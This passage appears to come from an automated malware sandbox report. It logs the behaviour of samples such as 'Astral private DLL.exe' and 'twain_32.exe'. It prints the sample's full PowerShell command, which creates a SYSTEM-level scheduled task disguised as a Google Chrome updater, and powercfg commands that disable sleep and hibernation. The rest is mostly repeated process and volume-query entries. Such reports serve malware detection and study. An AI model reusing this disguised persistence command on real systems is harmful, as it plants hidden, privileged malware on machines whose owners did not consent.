                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF04D.tmp" "c:\Windows\System32\CSCC4EE3A879404710AD2E4883A563BED.TMP"
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#amvyyojjq#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#amvyyojjq#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }Jump to behavior
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B01C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,20_2_00007FF603B01C64
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B01C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,20_2_00007FF603B01C64
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017F654 cpuid 1_2_0017F654
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_0017AF0F
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeQueries volume information: C:\containerperf\ServerComponenthostMonitorDll.exe VolumeInformationJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
